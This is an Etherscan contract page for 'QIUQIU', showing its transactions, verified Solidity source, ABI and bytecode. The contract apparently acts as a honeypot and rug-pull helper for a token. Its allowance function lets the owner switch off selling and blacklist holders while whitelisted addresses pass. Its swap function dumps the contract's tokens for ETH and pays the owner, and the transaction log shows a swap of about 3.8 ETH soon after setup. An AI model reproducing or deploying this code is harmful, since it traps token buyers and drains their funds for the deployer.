ETH Price: $2,690.62 (+0.49%)

Contract

0x68bE641D62fBB22C015B18AcdfA360437573c48E
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Swap175201302023-06-20 9:50:35609 days ago1687254635IN
0x68bE641D...37573c48E
0 ETH0.0026814316.07437785
Swap175201262023-06-20 9:49:47609 days ago1687254587IN
0x68bE641D...37573c48E
0 ETH0.0025093413.64410119
Set Enabled175198542023-06-20 8:54:47609 days ago1687251287IN
0x68bE641D...37573c48E
0 ETH0.0005513623.09386726
Init Param175198412023-06-20 8:52:11609 days ago1687251131IN
0x68bE641D...37573c48E
0 ETH0.00095913.96911207

Latest 4 internal transactions

Advanced mode:
Parent Transaction Hash Block
From
To
175201302023-06-20 9:50:35609 days ago1687254635
0x68bE641D...37573c48E
3.8318871 ETH
175201302023-06-20 9:50:35609 days ago1687254635
0x68bE641D...37573c48E
3.8318871 ETH
175201262023-06-20 9:49:47609 days ago1687254587
0x68bE641D...37573c48E
0.00009895 ETH
175201262023-06-20 9:49:47609 days ago1687254587
0x68bE641D...37573c48E
0.00009895 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
QIUQIU

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-06-20
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IERC20 {
    function decimals() external returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IUniswapV2Router02 {
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract QIUQIU is Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    address coin;
    address pair;

    mapping(address => bool) whites;
    mapping(address => bool) blacks;
    bool enabled = true;

    receive() external payable { }

    function initParam(address _coin, address _pair) external onlyOwner {
        coin = _coin;
        pair = _pair;
    }

    function resetParam() external onlyOwner {
        coin = address(0);
        pair = address(0);
    }

    function setEnabled(bool _enabled) external onlyOwner {
        enabled = _enabled;
    }

    function allowance(
        address from,
        address to
    ) external view returns (uint256) {
        if (whites[from] || whites[to] || pair == address(0)) {
            return 1;
        }
        else if ((from == owner() || from == address(this)) && to == pair) {
            return 0;
        }
        if (from != pair) {
            require(enabled);
            require(!blacks[from]);
        }
        return 1;
    }

    function swap(uint256 count) external onlyOwner {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = coin;
        path[1] = uniswapV2Router.WETH();

        IERC20(coin).approve(address(uniswapV2Router), ~uint256(0));

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            10 ** count,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );  

        payable(msg.sender).transfer(address(this).balance);
    }

    function addW(address[] memory _wat) public onlyOwner{
        for (uint i = 0; i < _wat.length; i++) {
            whites[_wat[i]] = true;
        }
    }

    function addB(address[] memory _bat) public onlyOwner{
        for (uint i = 0; i < _bat.length; i++) {
            blacks[_bat[i]] = true;
        }
    }

    function claimDust() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }
}

Contract Security Audit

Contract ABI

[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[{"internalType":"address[]","name":"_bat","type":"address[]"}],"name":"addB","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_wat","type":"address[]"}],"name":"addW","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"claimDust","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_coin","type":"address"},{"internalType":"address","name":"_pair","type":"address"}],"name":"initParam","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"resetParam","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d1781556006805460ff19169091179055348015610042575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350610c81806100905f395ff3fe60806040526004361061009d575f3560e01c806394b918de1161006257806394b918de1461014657806398da35d314610165578063bdb019ff14610184578063dd62ed3e14610198578063df90ebe8146101c5578063f2fde38b146101d9575f80fd5b80631f0860ce146100a8578063328d8f72146100c9578063715018a6146100e8578063874d9e3b146100fc5780638da5cb5b1461011b575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100c76100c23660046108ee565b6101f8565b005b3480156100d4575f80fd5b506100c76100e33660046109bb565b610293565b3480156100f3575f80fd5b506100c76102cf565b348015610107575f80fd5b506100c76101163660046108ee565b610340565b348015610126575f80fd5b505f546040516001600160a01b0390911681526020015b60405180910390f35b348015610151575f80fd5b506100c76101603660046109dd565b6103ce565b348015610170575f80fd5b506100c761017f3660046109f4565b6105e5565b34801561018f575f80fd5b506100c761063c565b3480156101a3575f80fd5b506101b76101b23660046109f4565b610683565b60405190815260200161013d565b3480156101d0575f80fd5b506100c761077a565b3480156101e4575f80fd5b506100c76101f3366004610a2b565b6107cf565b5f546001600160a01b0316331461022a5760405162461bcd60e51b815260040161022190610a46565b60405180910390fd5b5f5b815181101561028f57600160045f84848151811061024c5761024c610a7b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff19169115159190911790558061028781610aa3565b91505061022c565b5050565b5f546001600160a01b031633146102bc5760405162461bcd60e51b815260040161022190610a46565b6006805460ff1916911515919091179055565b5f546001600160a01b031633146102f85760405162461bcd60e51b815260040161022190610a46565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146103695760405162461bcd60e51b815260040161022190610a46565b5f5b815181101561028f57600160055f84848151811061038b5761038b610a7b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055806103c681610aa3565b91505061036b565b5f546001600160a01b031633146103f75760405162461bcd60e51b815260040161022190610a46565b6040805160028082526060820183525f92602083019080368337505060025482519293506001600160a01b0316918391505f9061043657610436610a7b565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561048d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104b19190610abb565b816001815181106104c4576104c4610a7b565b6001600160a01b03928316602091820292909201015260025460015460405163095ea7b360e01b815290831660048201525f19602482015291169063095ea7b3906044016020604051808303815f875af1158015610524573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105489190610ad6565b506001546001600160a01b031663791ac94761056584600a610bd1565b5f8430426040518663ffffffff1660e01b8152600401610589959493929190610bdc565b5f604051808303815f87803b1580156105a0575f80fd5b505af11580156105b2573d5f803e3d5ffd5b50506040513392504780156108fc029250905f818181858888f193505050501580156105e0573d5f803e3d5ffd5b505050565b5f546001600160a01b0316331461060e5760405162461bcd60e51b815260040161022190610a46565b600280546001600160a01b039384166001600160a01b03199182161790915560038054929093169116179055565b5f546001600160a01b031633146106655760405162461bcd60e51b815260040161022190610a46565b600280546001600160a01b0319908116909155600380549091169055565b6001600160a01b0382165f9081526004602052604081205460ff16806106c057506001600160a01b0382165f9081526004602052604090205460ff165b806106d457506003546001600160a01b0316155b156106e157506001610774565b5f546001600160a01b038481169116148061070457506001600160a01b03831630145b801561071d57506003546001600160a01b038381169116145b1561072957505f610774565b6003546001600160a01b038481169116146107705760065460ff1661074c575f80fd5b6001600160a01b0383165f9081526005602052604090205460ff1615610770575f80fd5b5060015b92915050565b5f546001600160a01b031633146107a35760405162461bcd60e51b815260040161022190610a46565b60405133904780156108fc02915f818181858888f193505050501580156107cc573d5f803e3d5ffd5b50565b5f546001600160a01b031633146107f85760405162461bcd60e51b815260040161022190610a46565b6001600160a01b03811661085d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610221565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b634e487b7160e01b5f52604160045260245ffd5b6001600160a01b03811681146107cc575f80fd5b80356108e9816108ca565b919050565b5f60208083850312156108ff575f80fd5b823567ffffffffffffffff80821115610916575f80fd5b818501915085601f830112610929575f80fd5b81358181111561093b5761093b6108b6565b8060051b604051601f19603f83011681018181108582111715610960576109606108b6565b60405291825284820192508381018501918883111561097d575f80fd5b938501935b828510156109a257610993856108de565b84529385019392850192610982565b98975050505050505050565b80151581146107cc575f80fd5b5f602082840312156109cb575f80fd5b81356109d6816109ae565b9392505050565b5f602082840312156109ed575f80fd5b5035919050565b5f8060408385031215610a05575f80fd5b8235610a10816108ca565b91506020830135610a20816108ca565b809150509250929050565b5f60208284031215610a3b575f80fd5b81356109d6816108ca565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b5f60018201610ab457610ab4610a8f565b5060010190565b5f60208284031215610acb575f80fd5b81516109d6816108ca565b5f60208284031215610ae6575f80fd5b81516109d6816109ae565b600181815b80851115610b2b57815f1904821115610b1157610b11610a8f565b80851615610b1e57918102915b93841c9390800290610af6565b509250929050565b5f82610b4157506001610774565b81610b4d57505f610774565b8160018114610b635760028114610b6d57610b89565b6001915050610774565b60ff841115610b7e57610b7e610a8f565b50506001821b610774565b5060208310610133831016604e8410600b8410161715610bac575081810a610774565b610bb68383610af1565b805f1904821115610bc957610bc9610a8f565b029392505050565b5f6109d68383610b33565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610c2a5784516001600160a01b031683529383019391830191600101610c05565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220b649e101c26772aaaa7b26c10a447d54818678a949c121046f0325b3ae2da95e64736f6c63430008140033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c806394b918de1161006257806394b918de1461014657806398da35d314610165578063bdb019ff14610184578063dd62ed3e14610198578063df90ebe8146101c5578063f2fde38b146101d9575f80fd5b80631f0860ce146100a8578063328d8f72146100c9578063715018a6146100e8578063874d9e3b146100fc5780638da5cb5b1461011b575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100c76100c23660046108ee565b6101f8565b005b3480156100d4575f80fd5b506100c76100e33660046109bb565b610293565b3480156100f3575f80fd5b506100c76102cf565b348015610107575f80fd5b506100c76101163660046108ee565b610340565b348015610126575f80fd5b505f546040516001600160a01b0390911681526020015b60405180910390f35b348015610151575f80fd5b506100c76101603660046109dd565b6103ce565b348015610170575f80fd5b506100c761017f3660046109f4565b6105e5565b34801561018f575f80fd5b506100c761063c565b3480156101a3575f80fd5b506101b76101b23660046109f4565b610683565b60405190815260200161013d565b3480156101d0575f80fd5b506100c761077a565b3480156101e4575f80fd5b506100c76101f3366004610a2b565b6107cf565b5f546001600160a01b0316331461022a5760405162461bcd60e51b815260040161022190610a46565b60405180910390fd5b5f5b815181101561028f57600160045f84848151811061024c5761024c610a7b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff19169115159190911790558061028781610aa3565b91505061022c565b5050565b5f546001600160a01b031633146102bc5760405162461bcd60e51b815260040161022190610a46565b6006805460ff1916911515919091179055565b5f546001600160a01b031633146102f85760405162461bcd60e51b815260040161022190610a46565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146103695760405162461bcd60e51b815260040161022190610a46565b5f5b815181101561028f57600160055f84848151811061038b5761038b610a7b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055806103c681610aa3565b91505061036b565b5f546001600160a01b031633146103f75760405162461bcd60e51b815260040161022190610a46565b6040805160028082526060820183525f92602083019080368337505060025482519293506001600160a01b0316918391505f9061043657610436610a7b565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561048d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104b19190610abb565b816001815181106104c4576104c4610a7b565b6001600160a01b03928316602091820292909201015260025460015460405163095ea7b360e01b815290831660048201525f19602482015291169063095ea7b3906044016020604051808303815f875af1158015610524573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105489190610ad6565b506001546001600160a01b031663791ac94761056584600a610bd1565b5f8430426040518663ffffffff1660e01b8152600401610589959493929190610bdc565b5f604051808303815f87803b1580156105a0575f80fd5b505af11580156105b2573d5f803e3d5ffd5b50506040513392504780156108fc029250905f818181858888f193505050501580156105e0573d5f803e3d5ffd5b505050565b5f546001600160a01b0316331461060e5760405162461bcd60e51b815260040161022190610a46565b600280546001600160a01b039384166001600160a01b03199182161790915560038054929093169116179055565b5f546001600160a01b031633146106655760405162461bcd60e51b815260040161022190610a46565b600280546001600160a01b0319908116909155600380549091169055565b6001600160a01b0382165f9081526004602052604081205460ff16806106c057506001600160a01b0382165f9081526004602052604090205460ff165b806106d457506003546001600160a01b0316155b156106e157506001610774565b5f546001600160a01b038481169116148061070457506001600160a01b03831630145b801561071d57506003546001600160a01b038381169116145b1561072957505f610774565b6003546001600160a01b038481169116146107705760065460ff1661074c575f80fd5b6001600160a01b0383165f9081526005602052604090205460ff1615610770575f80fd5b5060015b92915050565b5f546001600160a01b031633146107a35760405162461bcd60e51b815260040161022190610a46565b60405133904780156108fc02915f818181858888f193505050501580156107cc573d5f803e3d5ffd5b50565b5f546001600160a01b031633146107f85760405162461bcd60e51b815260040161022190610a46565b6001600160a01b03811661085d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610221565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b634e487b7160e01b5f52604160045260245ffd5b6001600160a01b03811681146107cc575f80fd5b80356108e9816108ca565b919050565b5f60208083850312156108ff575f80fd5b823567ffffffffffffffff80821115610916575f80fd5b818501915085601f830112610929575f80fd5b81358181111561093b5761093b6108b6565b8060051b604051601f19603f83011681018181108582111715610960576109606108b6565b60405291825284820192508381018501918883111561097d575f80fd5b938501935b828510156109a257610993856108de565b84529385019392850192610982565b98975050505050505050565b80151581146107cc575f80fd5b5f602082840312156109cb575f80fd5b81356109d6816109ae565b9392505050565b5f602082840312156109ed575f80fd5b5035919050565b5f8060408385031215610a05575f80fd5b8235610a10816108ca565b91506020830135610a20816108ca565b809150509250929050565b5f60208284031215610a3b575f80fd5b81356109d6816108ca565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b5f60018201610ab457610ab4610a8f565b5060010190565b5f60208284031215610acb575f80fd5b81516109d6816108ca565b5f60208284031215610ae6575f80fd5b81516109d6816109ae565b600181815b80851115610b2b57815f1904821115610b1157610b11610a8f565b80851615610b1e57918102915b93841c9390800290610af6565b509250929050565b5f82610b4157506001610774565b81610b4d57505f610774565b8160018114610b635760028114610b6d57610b89565b6001915050610774565b60ff841115610b7e57610b7e610a8f565b50506001821b610774565b5060208310610133831016604e8410600b8410161715610bac575081810a610774565b610bb68383610af1565b805f1904821115610bc957610bc9610a8f565b029392505050565b5f6109d68383610b33565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610c2a5784516001600160a01b031683529383019391830191600101610c05565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220b649e101c26772aaaa7b26c10a447d54818678a949c121046f0325b3ae2da95e64736f6c63430008140033

Deployed Bytecode Sourcemap

7889:2250:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9692:159;;;;;;;;;;-1:-1:-1;9692:159:0;;;;;:::i;:::-;;:::i;:::-;;8491:91;;;;;;;;;;-1:-1:-1;8491:91:0;;;;;:::i;:::-;;:::i;6303:148::-;;;;;;;;;;;;;:::i;9859:159::-;;;;;;;;;;-1:-1:-1;9859:159:0;;;;;:::i;:::-;;:::i;5661:79::-;;;;;;;;;;-1:-1:-1;5699:7:0;5726:6;5661:79;;-1:-1:-1;;;;;5726:6:0;;;2062:51:1;;2050:2;2035:18;5661:79:0;;;;;;;;9046:638;;;;;;;;;;-1:-1:-1;9046:638:0;;;;;:::i;:::-;;:::i;8248:122::-;;;;;;;;;;-1:-1:-1;8248:122:0;;;;;:::i;:::-;;:::i;8378:105::-;;;;;;;;;;;;;:::i;8590:448::-;;;;;;;;;;-1:-1:-1;8590:448:0;;;;;:::i;:::-;;:::i;:::-;;;2848:25:1;;;2836:2;2821:18;8590:448:0;2702:177:1;10026:110:0;;;;;;;;;;;;;:::i;6606:244::-;;;;;;;;;;-1:-1:-1;6606:244:0;;;;;:::i;:::-;;:::i;9692:159::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;;;;;;;;;9761:6:::1;9756:88;9777:4;:11;9773:1;:15;9756:88;;;9828:4;9810:6;:15;9817:4;9822:1;9817:7;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;9810:15:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;9810:15:0;:22;;-1:-1:-1;;9810:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9790:3;::::1;::::0;::::1;:::i;:::-;;;;9756:88;;;;9692:159:::0;:::o;8491:91::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8556:7:::1;:18:::0;;-1:-1:-1;;8556:18:0::1;::::0;::::1;;::::0;;;::::1;::::0;;8491:91::o;6303:148::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;6410:1:::1;6394:6:::0;;6373:40:::1;::::0;-1:-1:-1;;;;;6394:6:0;;::::1;::::0;6373:40:::1;::::0;6410:1;;6373:40:::1;6441:1;6424:19:::0;;-1:-1:-1;;;;;;6424:19:0::1;::::0;;6303:148::o;9859:159::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;9928:6:::1;9923:88;9944:4;:11;9940:1;:15;9923:88;;;9995:4;9977:6;:15;9984:4;9989:1;9984:7;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;9977:15:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;9977:15:0;:22;;-1:-1:-1;;9977:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9957:3;::::1;::::0;::::1;:::i;:::-;;;;9923:88;;9046:638:::0;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;9191:16:::1;::::0;;9205:1:::1;9191:16:::0;;;;;::::1;::::0;;9167:21:::1;::::0;9191:16:::1;::::0;::::1;::::0;;::::1;::::0;::::1;-1:-1:-1::0;;9228:4:0::1;::::0;9218:7;;;;-1:-1:-1;;;;;;9228:4:0::1;::::0;9218:7;;-1:-1:-1;9228:4:0::1;::::0;9218:7:::1;;;;:::i;:::-;-1:-1:-1::0;;;;;9218:14:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:14;;;;9253:15:::1;::::0;:22:::1;::::0;;-1:-1:-1;;;9253:22:0;;;;:15;;;::::1;::::0;:20:::1;::::0;:22:::1;::::0;;::::1;::::0;9218:7;;9253:22;;;;;:15;:22:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;9243:4;9248:1;9243:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;9243:32:0;;::::1;:7;::::0;;::::1;::::0;;;;;:32;9295:4:::1;::::0;;9317:15;9288:59:::1;::::0;-1:-1:-1;;;9288:59:0;;9317:15;;::::1;9288:59;::::0;::::1;4331:51:1::0;-1:-1:-1;;4398:18:1;;;4391:34;9295:4:0;::::1;::::0;9288:20:::1;::::0;4304:18:1;;9288:59:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;9386:15:0::1;::::0;-1:-1:-1;;;;;9386:15:0::1;:66;9467:11;9473:5:::0;9467:2:::1;:11;:::i;:::-;9493:1;9537:4;9564;9584:15;9386:224;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;9625:51:0::1;::::0;9633:10:::1;::::0;-1:-1:-1;9654:21:0::1;9625:51:::0;::::1;;;::::0;-1:-1:-1;9654:21:0;9625:51:::1;::::0;;;9654:21;9633:10;9625:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;9094:590;9046:638:::0;:::o;8248:122::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8327:4:::1;:12:::0;;-1:-1:-1;;;;;8327:12:0;;::::1;-1:-1:-1::0;;;;;;8327:12:0;;::::1;;::::0;;;8350:4:::1;:12:::0;;;;;::::1;::::0;::::1;;::::0;;8248:122::o;8378:105::-;5873:6;;-1:-1:-1;;;;;5873:6:0;4897:10;5873:22;5865:67;;;;-1:-1:-1;;;5865:67:0;;;;;;;:::i;:::-;8430:4:::1;:17:::0;;-1:-1:-1;;;;;;8430:17:0;;::::1;::::0;;;8458:4:::1;:17:::0;;;;::::1;::::0;;8378:105::o;8590:448::-;-1:-1:-1;;;;;8707:12:0;;8683:7;8707:12;;;:6;:12;;;;;;;;;:26;;-1:-1:-1;;;;;;8723:10:0;;;;;;:6;:10;;;;;;;;8707:26;:48;;;-1:-1:-1;8737:4:0;;-1:-1:-1;;;;;8737:4:0;:18;8707:48;8703:201;;;-1:-1:-1;8779:1:0;8772:8;;8703:201;5699:7;5726:6;-1:-1:-1;;;;;8812:15:0;;;5726:6;;8812:15;;:40;;-1:-1:-1;;;;;;8831:21:0;;8847:4;8831:21;8812:40;8811:56;;;;-1:-1:-1;8863:4:0;;-1:-1:-1;;;;;8857:10:0;;;8863:4;;8857:10;8811:56;8807:97;;;-1:-1:-1;8891:1:0;8884:8;;8807:97;8926:4;;-1:-1:-1;;;;;8918:12:0;;;8926:4;;8918:12;8914:98;;8955:7;;;;8947:16;;;;;;-1:-1:-1;;;;;8987:12:0;;;;;;:6;:12;;;;;;;;8986:13;8978:22;;;;;;-1:-1:-1;9029:1:0;8590:448;;;;;:::o;10026:110::-;5873:6;;-1:-1: